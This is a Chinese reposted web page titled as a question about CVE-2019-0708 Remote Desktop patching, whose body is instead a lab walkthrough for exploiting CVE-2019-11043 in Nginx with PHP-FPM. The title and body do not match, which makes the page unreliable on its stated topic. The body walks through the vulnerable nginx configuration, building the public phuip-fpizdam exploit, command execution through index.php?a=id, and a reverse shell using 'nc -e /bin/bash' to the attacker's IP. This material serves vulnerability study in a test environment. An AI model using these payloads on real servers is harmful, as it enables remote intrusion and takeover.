当前位置:首页 > 每日看点

求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?

卡卷网1年前 (2024-11-30)每日看点281

漏洞描述

CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。

该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下:

location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... }

攻击者可以使用换行符(%0a)来破坏 fastcgi_split_path_info 指令中的Regexp。 Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。

影响范围

在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:

PHP 7.0 版本 PHP 7.1 版本 PHP 7.2 版本 PHP 7.3 版本

漏洞复现

使用 p 牛的 docker 环境进行复现:

PHP-FPM 远程代码执行漏洞(CVE-2019-11043)

准备工作:安装docker、golang环境

sudo apt-get install docker docker-compose sudo apt install golang

攻击机:kali-linux-2022.4(192.168.81.162)

靶机:kali-linux-2022.4(192.168.81.150)

1.在靶机上搭建漏洞环境

git clone https://github.com/vulhub/vulhub.git


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第1张


cd vulhub/php/CVE-2019-11043 docker-compose up -d


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第2张


2.启动环境后,访问 靶机ip:8080/index.php ,就可以看到漏洞环境的默认页面。


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第3张


3.安装漏洞利用工具

git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam go get -v && go build


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第4张


4.漏洞利用


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第5张


5.访问 index.php?a=id

注意:只有部分PHP-FPM子进程受到了污染,因此请尝试几次以执行该命令。


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第6张



求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第7张


反弹shell

在环境中安装 nc


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第8张



求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第9张


攻击机开启监听

nc -lvp 9999


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第10张


输入payload

?a=nc -e /bin/bash 192.168.81.162 9999

反弹shell成功


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第11张


参考链接

blog.leanote.com/post/s

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2024/11/2257.html

分享给朋友:

相关文章

现在做抖音的话,还有机会嘛?

现在做抖音的话,还有机会嘛?

之前我问过小杨哥一个问题:“现在抖音还好做吗?” 疯狂小杨哥在抖音已经突破1亿粉丝,直播间10w的在线观看人数,日常带货随便一场也是上7位数的数据。 现在抖音的市场好像已经被头部占领,资源靠前,普通人似乎已经没有机会了? 下面是小杨哥对于做…

什么软件可以看电视直播?

什么软件可以看电视直播?

2024年9月6日最新更新:本文列举的 所有看电视直播、或流媒体影视资源点播的软件,我这两天又重新梳理成最新版本,最大程度保证可用性。获取方式见文末图片,或见评论。后续我也将持续更新,文章是旧的软件也会是新的,保证都是最新可用版本。作为一个…

手机买16+256的还是12+512的好?

手机买16+256的还是12+512的好?

到底选大内存还是大存储,一直以来是很多朋友的纠结点,大内存意味着可以应用多开不卡顿,大存储则是可以存入更多文件、应用,如果两个配置价格差距不大(如0-200元),确实有点难选。 不过从实际体验出发,大存储的手机显然更应该优先选择才是。首先,…

自媒体如何快速起步?

自媒体如何快速起步?

有两种经验,可供参考。 第一种是:现象级的爆火、爆款,这种情况捞到钱,实现财务自由的人并不多,但确实存在。只不过非要说清楚为什么这个账号可以火、可以短时间内赚到普通人一辈子赚不到的钱,他们自己也不一定能说清楚,因为赶上了风口(内外部情况)。…

计算机专业不干互联网不热爱技术,还能转行干什么?

转行的思路,无非也就是那几个。 我们顺着每个思路,一路捋一遍,基本上,大致可行的方向,也就有了。 一、跟对口职业和岗位业务链条相邻的职业和岗位计算机专业如果找到了对口的技术岗位,跟技术工作联系最紧密的岗位是什么? 产品经理。当然,大多数产品…

小米15就要来了,不知道小米15值不值得买?

小米15就要来了,不知道小米15值不值得买?

俗话说得好,好饭不怕晚,看似有点姗姗来迟的小米15系列,一官宣就迅速登上热搜。 在此次小米14发布会上,雷军曾说过小米14将是最后一代3999起的旗舰,那么这一次涨价了的小米15,值不值得买呢?下面为大家总结一下小米15将会有哪些升级点:…

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。